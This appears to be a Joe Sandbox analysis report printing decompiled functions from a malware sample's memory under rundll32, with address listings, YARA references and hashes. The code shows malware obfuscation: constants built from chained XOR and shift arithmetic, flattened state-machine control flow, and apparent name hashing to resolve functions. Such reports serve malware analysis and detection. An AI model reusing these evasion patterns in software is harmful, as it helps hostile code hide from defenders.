                                                                                                                      Function 0035C38F Relevance: 3.9, Strings: 3, Instructions: 155COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0035C38F(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t139;
				void* _t153;
				signed int _t154;
				void* _t157;
				void* _t169;
				signed int _t170;
				signed int _t171;
				void* _t173;
				signed int* _t175;

				_t155 = _a4;
				_push(_a8);
				_t173 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t139);
				_v8 = _v8 & 0x00000000;
				_t175 =  &(( &_v80)[4]);
				_v4 = _v4 & 0x00000000;
				_v16 = 0x6f933c;
				_t169 = 0;
				_v12 = 0xacafca;
				_t157 = 0x2c6486;
				_v40 = 0xf6c939;
				_t170 = 0xb;
				_v40 = _v40 / _t170;
				_v40 = _v40 ^ 0x00166f60;
				_v36 = 0x3062f8;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0x60c5f010;
				_v56 = 0xc1f429;
				_v56 = _v56 << 9;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x5f429000;
				_v80 = 0x6a6c05;
				_v80 = _v80 | 0xf56e7669;
				_t171 = 0x32;
				_v80 = _v80 * 0x6f;
				_v80 = _v80 + 0xffff851e;
				_v80 = _v80 ^ 0x6ae37c08;
				_v60 = 0x567c0c;
				_v60 = _v60 + 0xd503;
				_v60 = _v60 * 0x3a;
				_v60 = _v60 ^ 0x13c3775e;
				_v64 = 0x59a2ac;
				_v64 = _v64 | 0x5ac15ac1;
				_v64 = _v64 ^ 0x94d4ce27;
				_v64 = _v64 ^ 0xce05e559;
				_v44 = 0x50d454;
				_v44 = _v44 * 0x6a;
				_v44 = _v44 ^ 0x2175139d;
				_v48 = 0x5a75fb;
				_v48 = _v48 * 0x57;
				_v48 = _v48 ^ 0x1eb14dac;
				_v24 = 0x99b258;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x099f4f84;
				_v76 = 0x853d43;
				_v76 = _v76 >> 1;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 | 0x5f7f2022;
				_v76 = _v76 ^ 0x5f753756;
				_v28 = 0xded29;
				_v28 = _v28 | 0xc4be8170;
				_v28 = _v28 ^ 0xc4b8b15a;
				_v32 = 0x545bb5;
				_v32 = _v32 + 0xe4b1;
				_v32 = _v32 ^ 0x005c5734;
				_v68 = 0xaed47d;
				_v68 = _v68 << 0xf;
				_v68 = _v68 | 0x1d211fc5;
				_v68 = _v68 / _t171;
				_v68 = _v68 ^ 0x02801ca0;
				_v52 = 0x7d6e82;
				_v52 = _v52 >> 0x10;
				_v52 = _v52 * 0x56;
				_v52 = _v52 ^ 0x0007d38d;
				_v72 = 0xcd2745;
				_v72 = _v72 ^ 0xed8bacb0;
				_v72 = _v72 + 0xffffdf8c;
				_v72 = _v72 | 0xe372d41f;
				_v72 = _v72 ^ 0xef7557f2;
				_v20 = 0x88cfe7;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x0008c4a6;
				_t172 = _v20;
				while(_t157 != 0x2c6486) {
					if(_t157 == 0x2a600e7) {
						E00354DAD(_v68, _v52, _t172, _v72, _v20);
					} else {
						if(_t157 == 0xbcc0c39) {
							_t153 = E0034EEB8(_v24, _v76, _t172,  *((intOrPtr*)(_t155 + 4)), _t157, _t155 + 4, _v28, _v32,  *_t155);
							_t175 =  &(_t175[7]);
							_t169 = _t153;
							_t157 = 0x2a600e7;
							continue;
						} else {
							if(_t157 != 0xd3b3a19) {
								L9:
								if(_t157 != 0xb00d47) {
									continue;
								} else {
								}
							} else {
								_t154 = E0035E938(_v36, _v56, _v80, _v60, _v40, _t157, _v64, _v44, _t157, _v48, 0, _t173);
								_t172 = _t154;
								_t175 =  &(_t175[0xa]);
								if(_t154 != 0xffffffff) {
									_t157 = 0xbcc0c39;
									continue;
								}
							}
						}
					}
					return _t169;
				}
				_t157 = 0xd3b3a19;
				goto L9;
			}
































                                                                                                                      0x0035c393
                                                                                                                      0x0035c39a
                                                                                                                      0x0035c39e
                                                                                                                      0x0035c3a0
                                                                                                                      0x0035c3a1
                                                                                                                      0x0035c3a2
                                                                                                                      0x0035c3a3
                                                                                                                      0x0035c3a8
                                                                                                                      0x0035c3ad
                                                                                                                      0x0035c3b0
                                                                                                                      0x0035c3b7
                                                                                                                      0x0035c3bf
                                                                                                                      0x0035c3c1
                                                                                                                      0x0035c3c9
                                                                                                                      0x0035c3ce
                                                                                                                      0x0035c3dc
                                                                                                                      0x0035c3e1
                                                                                                                      0x0035c3e7
                                                                                                                      0x0035c3ef
                                                                                                                      0x0035c3f7
                                                                                                                      0x0035c3fc
                                                                                                                      0x0035c404
                                                                                                                      0x0035c40c
                                                                                                                      0x0035c411
                                                                                                                      0x0035c416
                                                                                                                      0x0035c41e
                                                                                                                      0x0035c426
                                                                                                                      0x0035c433
                                                                                                                      0x0035c434
                                                                                                                      0x0035c438
                                                                                                                      0x0035c440
                                                                                                                      0x0035c448
                                                                                                                      0x0035c450
                                                                                                                      0x0035c45d
                                                                                                                      0x0035c461
                                                                                                                      0x0035c469
                                                                                                                      0x0035c471
                                                                                                                      0x0035c479
                                                                                                                      0x0035c481
                                                                                                                      0x0035c489
                                                                                                                      0x0035c496
                                                                                                                      0x0035c49a
                                                                                                                      0x0035c4a2
                                                                                                                      0x0035c4af
                                                                                                                      0x0035c4b3
                                                                                                                      0x0035c4bb
                                                                                                                      0x0035c4c3
                                                                                                                      0x0035c4c8
                                                                                                                      0x0035c4d0
                                                                                                                      0x0035c4d8
                                                                                                                      0x0035c4dc
                                                                                                                      0x0035c4e1
                                                                                                                      0x0035c4e9
                                                                                                                      0x0035c4f1
                                                                                                                      0x0035c4f9
                                                                                                                      0x0035c501
                                                                                                                      0x0035c509
                                                                                                                      0x0035c511
                                                                                                                      0x0035c519
                                                                                                                      0x0035c521
                                                                                                                      0x0035c529
                                                                                                                      0x0035c52e
                                                                                                                      0x0035c53c
                                                                                                                      0x0035c540
                                                                                                                      0x0035c548
                                                                                                                      0x0035c550
                                                                                                                      0x0035c55a
                                                                                                                      0x0035c55e
                                                                                                                      0x0035c566
                                                                                                                      0x0035c56e
                                                                                                                      0x0035c576
                                                                                                                      0x0035c57e
                                                                                                                      0x0035c586
                                                                                                                      0x0035c58e
                                                                                                                      0x0035c596
                                                                                                                      0x0035c59b
                                                                                                                      0x0035c5a3
                                                                                                                      0x0035c5a7
                                                                                                                      0x0035c5b9
                                                                                                                      0x0035c65c
                                                                                                                      0x0035c5bf
                                                                                                                      0x0035c5c5
                                                                                                                      0x0035c624
                                                                                                                      0x0035c629
                                                                                                                      0x0035c62c
                                                                                                                      0x0035c62e
                                                                                                                      0x00000000
                                                                                                                      0x0035c5c7
                                                                                                                      0x0035c5cd
                                                                                                                      0x0035c63d
                                                                                                                      0x0035c643
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035c649
                                                                                                                      0x0035c5cf
                                                                                                                      0x0035c5f4
                                                                                                                      0x0035c5f9
                                                                                                                      0x0035c5fb
                                                                                                                      0x0035c601
                                                                                                                      0x0035c603
                                                                                                                      0x00000000
                                                                                                                      0x0035c603
                                                                                                                      0x0035c601
                                                                                                                      0x0035c5cd
                                                                                                                      0x0035c5c5
                                                                                                                      0x0035c66d
                                                                                                                      0x0035c66d
                                                                                                                      0x0035c638
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$4W\$V7u_
                                                                                                                      • API String ID: 0-1304481894
                                                                                                                      • Opcode ID: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction ID: 67c623f3d0a0ce57e3a20b544d74f5b024b18b093facb8079256bf4038caf143
                                                                                                                      • Opcode Fuzzy Hash: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction Fuzzy Hash: 4F711F710193409FC359CF61C54A91BBBF1FBC5B58F005A0DF6969A260D3B69A09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003604DE Relevance: 3.9, Strings: 3, Instructions: 136COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E003604DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t114;
				void* _t125;
				void* _t128;
				signed int _t132;
				void* _t135;
				void* _t148;
				signed int* _t151;

				_push(_a12);
				_t147 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t114);
				_v60 = 0xcc4817;
				_t151 =  &(( &_v96)[5]);
				_v60 = _v60 << 8;
				_v60 = _v60 ^ 0xcc47e657;
				_t148 = 0;
				_v68 = 0xe0ed25;
				_t135 = 0xdcadf3a;
				_v68 = _v68 | 0xce8f6412;
				_v68 = _v68 ^ 0xf3afd128;
				_v68 = _v68 ^ 0x3d42c27e;
				_v72 = 0x9a5a35;
				_v72 = _v72 >> 7;
				_t132 = 0x47;
				_v72 = _v72 * 0x61;
				_v72 = _v72 ^ 0x007dafa6;
				_v76 = 0x100281;
				_v76 = _v76 + 0xffff4995;
				_v76 = _v76 ^ 0x3bbc9aa1;
				_v76 = _v76 ^ 0x3bbd0b56;
				_v84 = 0xc6f502;
				_v84 = _v84 / _t132;
				_v84 = _v84 >> 1;
				_v84 = _v84 | 0x31db5564;
				_v84 = _v84 ^ 0x31df2935;
				_v88 = 0xec4ee3;
				_t44 =  &_v88; // 0xec4ee3
				_v88 =  *_t44 * 0x67;
				_v88 = _v88 >> 3;
				_v88 = _v88 | 0x81ddbea1;
				_v88 = _v88 ^ 0x8bf24dda;
				_v92 = 0xa20219;
				_v92 = _v92 + 0x973c;
				_v92 = _v92 | 0xc6adcdd8;
				_v92 = _v92 << 0xa;
				_v92 = _v92 ^ 0xbf7a6030;
				_v96 = 0x474fb;
				_v96 = _v96 + 0x4e06;
				_v96 = _v96 * 0x4d;
				_v96 = _v96 ^ 0xb0fe0c99;
				_v96 = _v96 ^ 0xb19d06b7;
				_v52 = 0x7e1eaf;
				_v52 = _v52 ^ 0x3657a741;
				_v52 = _v52 ^ 0x362fc7d5;
				_v80 = 0x982156;
				_v80 = _v80 >> 1;
				_v80 = _v80 * 0x77;
				_v80 = _v80 * 0x51;
				_v80 = _v80 ^ 0x3002d3c9;
				_v56 = 0xfe8a73;
				_v56 = _v56 | 0x35e06d03;
				_v56 = _v56 ^ 0x35fae637;
				_v64 = 0x133817;
				_v64 = _v64 | 0xd744828f;
				_v64 = _v64 + 0x2427;
				_v64 = _v64 ^ 0xd75b1468;
				do {
					while(_t135 != 0x54f2717) {
						if(_t135 == 0x5ba048a) {
							_t128 = E0035B9B1(_v84, _v88, __eflags, _t147 + 0x34, _v92,  &_v48, _v96);
							_t151 =  &(_t151[4]);
							__eflags = _t128;
							if(__eflags != 0) {
								_t135 = 0x54f2717;
								continue;
							}
						} else {
							if(_t135 == 0xb11095c) {
								E003564C5(_v60, _v68, _v72, _v76, _a4,  &_v48);
								_t151 =  &(_t151[4]);
								_t135 = 0x5ba048a;
								continue;
							} else {
								if(_t135 != 0xdcadf3a) {
									goto L10;
								} else {
									_t135 = 0xb11095c;
									continue;
								}
							}
						}
						goto L11;
					}
					_t125 = E0035B9B1(_v52, _v80, __eflags, _t147 + 0x10, _v56,  &_v48, _v64);
					_t151 =  &(_t151[4]);
					__eflags = _t125;
					_t148 =  !=  ? 1 : _t148;
					_t135 = 0xe1bb211;
					L10:
					__eflags = _t135 - 0xe1bb211;
				} while (__eflags != 0);
				L11:
				return _t148;
			}























                                                                                                                      0x003604e5
                                                                                                                      0x003604e9
                                                                                                                      0x003604ed
                                                                                                                      0x003604ee
                                                                                                                      0x003604f2
                                                                                                                      0x003604f3
                                                                                                                      0x003604f4
                                                                                                                      0x003604f9
                                                                                                                      0x00360501
                                                                                                                      0x00360504
                                                                                                                      0x0036050b
                                                                                                                      0x00360513
                                                                                                                      0x00360515
                                                                                                                      0x0036051d
                                                                                                                      0x00360522
                                                                                                                      0x0036052f
                                                                                                                      0x00360537
                                                                                                                      0x0036053f
                                                                                                                      0x00360547
                                                                                                                      0x00360553
                                                                                                                      0x00360554
                                                                                                                      0x00360558
                                                                                                                      0x00360560
                                                                                                                      0x00360568
                                                                                                                      0x00360570
                                                                                                                      0x00360578
                                                                                                                      0x00360580
                                                                                                                      0x00360593
                                                                                                                      0x00360597
                                                                                                                      0x0036059b
                                                                                                                      0x003605a3
                                                                                                                      0x003605ab
                                                                                                                      0x003605b3
                                                                                                                      0x003605b8
                                                                                                                      0x003605bc
                                                                                                                      0x003605c1
                                                                                                                      0x003605c9
                                                                                                                      0x003605d1
                                                                                                                      0x003605d9
                                                                                                                      0x003605e1
                                                                                                                      0x003605e9
                                                                                                                      0x003605ee
                                                                                                                      0x003605f6
                                                                                                                      0x003605fe
                                                                                                                      0x0036060b
                                                                                                                      0x0036060f
                                                                                                                      0x00360617
                                                                                                                      0x0036061f
                                                                                                                      0x00360627
                                                                                                                      0x0036062f
                                                                                                                      0x00360637
                                                                                                                      0x0036063f
                                                                                                                      0x00360648
                                                                                                                      0x00360651
                                                                                                                      0x00360655
                                                                                                                      0x0036065d
                                                                                                                      0x00360665
                                                                                                                      0x0036066d
                                                                                                                      0x00360675
                                                                                                                      0x0036067d
                                                                                                                      0x00360685
                                                                                                                      0x0036068d
                                                                                                                      0x00360695
                                                                                                                      0x00360695
                                                                                                                      0x0036069f
                                                                                                                      0x003606f6
                                                                                                                      0x003606fb
                                                                                                                      0x003606fe
                                                                                                                      0x00360700
                                                                                                                      0x00360702
                                                                                                                      0x00000000
                                                                                                                      0x00360702
                                                                                                                      0x003606a1
                                                                                                                      0x003606a3
                                                                                                                      0x003606ce
                                                                                                                      0x003606d3
                                                                                                                      0x003606d6
                                                                                                                      0x00000000
                                                                                                                      0x003606a5
                                                                                                                      0x003606ab
                                                                                                                      0x00000000
                                                                                                                      0x003606b1
                                                                                                                      0x003606b1
                                                                                                                      0x00000000
                                                                                                                      0x003606b1
                                                                                                                      0x003606ab
                                                                                                                      0x003606a3
                                                                                                                      0x00000000
                                                                                                                      0x0036069f
                                                                                                                      0x0036071f
                                                                                                                      0x00360726
                                                                                                                      0x0036072a
                                                                                                                      0x0036072c
                                                                                                                      0x0036072f
                                                                                                                      0x00360734
                                                                                                                      0x00360734
                                                                                                                      0x00360734
                                                                                                                      0x00360741
                                                                                                                      0x00360749

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$'$$N
                                                                                                                      • API String ID: 0-2135679241
                                                                                                                      • Opcode ID: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction ID: 900eb4579d401c0df48a2b58645d8bdc00065437ed0b686baf0e58e90a9e0d29
                                                                                                                      • Opcode Fuzzy Hash: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction Fuzzy Hash: 915123B11083829FC749CF21C58681BFBF4FBD8348F509A1DF5A696220D371DA598F86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035026B Relevance: 3.9, Strings: 3, Instructions: 134COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0035026B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t108;
				void* _t117;
				void* _t124;
				void* _t126;
				void* _t141;
				signed int _t142;
				signed int _t143;
				signed int* _t146;

				_push(_a12);
				_t140 = _a4;
				_t124 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t108);
				_v92 = 0x51c9e1;
				_t146 =  &(( &_v96)[5]);
				_v92 = _v92 << 4;
				_t141 = 0;
				_t126 = 0x4bb83f6;
				_t142 = 0x49;
				_v92 = _v92 * 0x6e;
				_v92 = _v92 + 0x829d;
				_v92 = _v92 ^ 0x32495c11;
				_v68 = 0x73c01f;
				_v68 = _v68 + 0x1dcd;
				_v68 = _v68 ^ 0x00720d8f;
				_v96 = 0xb49fc9;
				_v96 = _v96 + 0x43a3;
				_v96 = _v96 ^ 0x15acb626;
				_v96 = _v96 << 0x10;
				_v96 = _v96 ^ 0x554d7300;
				_v84 = 0x939dbf;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 / _t142;
				_v84 = _v84 ^ 0x000cd20a;
				_v60 = 0xb12a06;
				_v60 = _v60 | 0x23fd9b15;
				_v60 = _v60 ^ 0x23fc0752;
				_v76 = 0x2839ff;
				_v76 = _v76 + 0xfffff40d;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x0280e51a;
				_v80 = 0xa0e526;
				_v80 = _v80 | 0xbc5e80d8;
				_v80 = _v80 >> 7;
				_v80 = _v80 ^ 0x017df397;
				_v64 = 0xa3347;
				_t143 = 0x14;
				_v64 = _v64 * 0x36;
				_v64 = _v64 ^ 0x02285917;
				_v88 = 0x8f496e;
				_v88 = _v88 + 0x138c;
				_v88 = _v88 + 0x9d7d;
				_v88 = _v88 / _t143;
				_v88 = _v88 ^ 0x000c7ae1;
				_v72 = 0x3c508e;
				_v72 = _v72 ^ 0xe86d4278;
				_v72 = _v72 | 0x3236ed5f;
				_v72 = _v72 ^ 0xfa734a26;
				_v52 = 0x119dd9;
				_v52 = _v52 ^ 0x40537751;
				_v52 = _v52 ^ 0x404ccff2;
				_v56 = 0x89ec9d;
				_v56 = _v56 ^ 0xd17cb195;
				_v56 = _v56 ^ 0xd1fa716b;
				do {
					while(_t126 != 0x360725a) {
						if(_t126 == 0x4bb83f6) {
							_t126 = 0x9f53cee;
							continue;
						} else {
							if(_t126 == 0x6abf560) {
								__eflags = E0035B9B1(_v88, _v72, __eflags, _t140 + 4, _v52,  &_v48, _v56);
								_t141 =  !=  ? 1 : _t141;
							} else {
								if(_t126 != 0x9f53cee) {
									goto L10;
								} else {
									E003564C5(_v92, _v68, _v96, _v84, _t124,  &_v48);
									_t146 =  &(_t146[4]);
									_t126 = 0x360725a;
									continue;
								}
							}
						}
						L13:
						return _t141;
					}
					_t117 = E0034B09F(_v60, _v76,  &_v48, _v80, _t140, _v64);
					_t146 =  &(_t146[4]);
					__eflags = _t117;
					if(__eflags == 0) {
						_t126 = 0x3e1d0be;
						goto L10;
					} else {
						_t126 = 0x6abf560;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t126 - 0x3e1d0be;
				} while (__eflags != 0);
				goto L13;
			}
























                                                                                                                      0x00350272
                                                                                                                      0x00350276
                                                                                                                      0x0035027a
                                                                                                                      0x0035027c
                                                                                                                      0x00350280
                                                                                                                      0x00350281
                                                                                                                      0x00350282
                                                                                                                      0x00350283
                                                                                                                      0x00350288
                                                                                                                      0x00350290
                                                                                                                      0x00350293
                                                                                                                      0x0035029f
                                                                                                                      0x003502a1
                                                                                                                      0x003502a8
                                                                                                                      0x003502ab
                                                                                                                      0x003502af
                                                                                                                      0x003502b7
                                                                                                                      0x003502bf
                                                                                                                      0x003502c7
                                                                                                                      0x003502cf
                                                                                                                      0x003502d7
                                                                                                                      0x003502df
                                                                                                                      0x003502e7
                                                                                                                      0x003502ef
                                                                                                                      0x003502f4
                                                                                                                      0x003502fc
                                                                                                                      0x00350304
                                                                                                                      0x00350311
                                                                                                                      0x00350315
                                                                                                                      0x0035031d
                                                                                                                      0x00350325
                                                                                                                      0x0035032d
                                                                                                                      0x00350335
                                                                                                                      0x0035033d
                                                                                                                      0x00350345
                                                                                                                      0x0035034a
                                                                                                                      0x00350352
                                                                                                                      0x0035035a
                                                                                                                      0x00350362
                                                                                                                      0x00350367
                                                                                                                      0x0035036f
                                                                                                                      0x0035037c
                                                                                                                      0x0035037d
                                                                                                                      0x00350381
                                                                                                                      0x00350389
                                                                                                                      0x00350391
                                                                                                                      0x00350399
                                                                                                                      0x003503ac
                                                                                                                      0x003503b0
                                                                                                                      0x003503b8
                                                                                                                      0x003503c0
                                                                                                                      0x003503c8
                                                                                                                      0x003503d0
                                                                                                                      0x003503d8
                                                                                                                      0x003503e0
                                                                                                                      0x003503e8
                                                                                                                      0x003503f0
                                                                                                                      0x003503f8
                                                                                                                      0x00350400
                                                                                                                      0x00350408
                                                                                                                      0x00350408
                                                                                                                      0x00350416
                                                                                                                      0x00350449
                                                                                                                      0x00000000
                                                                                                                      0x00350418
                                                                                                                      0x0035041a
                                                                                                                      0x003504a9
                                                                                                                      0x003504ab
                                                                                                                      0x0035041c
                                                                                                                      0x00350422
                                                                                                                      0x00000000
                                                                                                                      0x00350424
                                                                                                                      0x0035043a
                                                                                                                      0x0035043f
                                                                                                                      0x00350442
                                                                                                                      0x00000000
                                                                                                                      0x00350442
                                                                                                                      0x00350422
                                                                                                                      0x0035041a
                                                                                                                      0x003504af
                                                                                                                      0x003504b7
                                                                                                                      0x003504b7
                                                                                                                      0x00350466
                                                                                                                      0x0035046b
                                                                                                                      0x0035046e
                                                                                                                      0x00350470
                                                                                                                      0x00350476
                                                                                                                      0x00000000
                                                                                                                      0x00350472
                                                                                                                      0x00350472
                                                                                                                      0x00000000
                                                                                                                      0x00350472
                                                                                                                      0x00000000
                                                                                                                      0x0035047b
                                                                                                                      0x0035047b
                                                                                                                      0x0035047b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G3$QwS@$_62
                                                                                                                      • API String ID: 0-451131340
                                                                                                                      • Opcode ID: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction ID: 0ace65bf5d54c3c3fe9e2933c6abbde43e68770f5ce375c6ec533792e055e53c
                                                                                                                      • Opcode Fuzzy Hash: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction Fuzzy Hash: B25167B11083449FD348DF21C58A82FFBE5FBC4758F505A1DFA96A6261D3B1DA488B83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034C850 Relevance: 3.9, Strings: 3, Instructions: 125COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0034C850(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				char _v328;
				char _t126;
				void* _t128;
				signed int _t129;
				void* _t133;
				signed int _t135;
				signed int _t136;
				char* _t137;
				intOrPtr* _t154;

				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v68 = 0xeb7817;
				_v44 = 0x4dbb17;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x000af917;
				_v12 = 0xca90c;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 | 0x67e1d035;
				_v12 = _v12 ^ 0x67ebacbe;
				_v32 = 0xdd0ad5;
				_v32 = _v32 >> 6;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x00040440;
				_v16 = 0xaefc2a;
				_v16 = _v16 ^ 0x05a88ae0;
				_t154 = __ecx;
				_t135 = 0x4a;
				_v16 = _v16 / _t135;
				_v16 = _v16 | 0x6472a2d9;
				_v16 = _v16 ^ 0x647c73c3;
				_v8 = 0x7aea22;
				_t136 = 0x5f;
				_v8 = _v8 * 0x1d;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x0003680c;
				_v28 = 0xd7a14b;
				_v28 = _v28 >> 1;
				_v28 = _v28 | 0x0e275eed;
				_v28 = _v28 ^ 0x0e6be1b9;
				_v56 = 0x693eb0;
				_t137 =  &_v328;
				_v56 = _v56 / _t136;
				_v56 = _v56 ^ 0x00052716;
				_v52 = 0x6599ea;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x659cef3f;
				_v36 = 0xaf3092;
				_v36 = _v36 + 0xffffd3bf;
				_v36 = _v36 ^ 0x419856f6;
				_v36 = _v36 ^ 0x413f6f4c;
				_v40 = 0x56314e;
				_v40 = _v40 ^ 0x0d0339a4;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x0068e9be;
				_v20 = 0xd689b7;
				_v20 = _v20 >> 1;
				_v20 = _v20 + 0x3668;
				_v20 = _v20 ^ 0x006dcd8c;
				_v24 = 0x36edf6;
				_v24 = _v24 + 0x231d;
				_v24 = _v24 ^ 0xb40b6ffd;
				_v24 = _v24 ^ 0xb434c03a;
				_v48 = 0x867594;
				_v48 = _v48 * 0x3a;
				_v48 = _v48 ^ 0x1e7cd6f5;
				while(1) {
					_t126 =  *_t154;
					if(_t126 == 0) {
						break;
					}
					if(_t126 == 0x2e) {
						 *_t137 = 0;
					} else {
						 *_t137 = _t126;
						_t137 = _t137 + 1;
						_t154 = _t154 + 1;
						continue;
					}
					L6:
					_t128 = E003559B7(_v44, _v12,  &_v328, _v32);
					_t155 = _t128;
					if(_t128 != 0) {
						L8:
						_t129 = E0035FE5E(_v56, _t154 + 1, _v52, _v36);
						_push(_v48);
						_push(_v24);
						_push(_v20);
						_push(_v40);
						return E0034F2C1(_t155, _t129 ^ 0x3e95e426);
					}
					_t133 = E0035F949(_v16, _v8,  &_v328, _v28);
					_t155 = _t133;
					if(_t133 != 0) {
						goto L8;
					}
					return _t133;
				}
				goto L6;
			}




























                                                                                                                      0x0034c859
                                                                                                                      0x0034c85f
                                                                                                                      0x0034c863
                                                                                                                      0x0034c86a
                                                                                                                      0x0034c871
                                                                                                                      0x0034c875
                                                                                                                      0x0034c87c
                                                                                                                      0x0034c883
                                                                                                                      0x0034c887
                                                                                                                      0x0034c88b
                                                                                                                      0x0034c892
                                                                                                                      0x0034c899
                                                                                                                      0x0034c8a0
                                                                                                                      0x0034c8a4
                                                                                                                      0x0034c8a8
                                                                                                                      0x0034c8af
                                                                                                                      0x0034c8b6
                                                                                                                      0x0034c8c4
                                                                                                                      0x0034c8c6
                                                                                                                      0x0034c8cb
                                                                                                                      0x0034c8d0
                                                                                                                      0x0034c8d7
                                                                                                                      0x0034c8de
                                                                                                                      0x0034c8e9
                                                                                                                      0x0034c8ea
                                                                                                                      0x0034c8ed
                                                                                                                      0x0034c8f1
                                                                                                                      0x0034c8f5
                                                                                                                      0x0034c8fc
                                                                                                                      0x0034c903
                                                                                                                      0x0034c906
                                                                                                                      0x0034c90d
                                                                                                                      0x0034c914
                                                                                                                      0x0034c920
                                                                                                                      0x0034c926
                                                                                                                      0x0034c929
                                                                                                                      0x0034c930
                                                                                                                      0x0034c937
                                                                                                                      0x0034c93b
                                                                                                                      0x0034c942
                                                                                                                      0x0034c949
                                                                                                                      0x0034c950
